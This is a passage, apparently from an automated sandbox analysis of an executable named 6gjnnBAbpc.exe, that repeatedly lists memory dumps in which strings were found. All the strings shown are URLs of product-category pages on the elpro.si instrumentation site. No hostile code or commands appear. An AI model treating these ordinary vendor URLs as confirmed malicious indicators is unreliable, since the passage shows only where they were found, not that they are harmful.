6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/modula
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/nadzor
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/ostalo
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/pisaln
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/prosto
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/zancno
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/livarstvo/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/plasticarstvo/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/aktivnost-vode-rotronic-meritve-water-activity-rotr
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/co2-rotronic-merilniki-ogljikovega-dioksida/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/dew-point-rotronic-meritve-tocke-rosisca-rotronic-v
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/diferencialni-tlak-rotronic-merilniki-diferencialne
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/dodatna-oprema-rotronic-montazna-prikljucna-kalibra
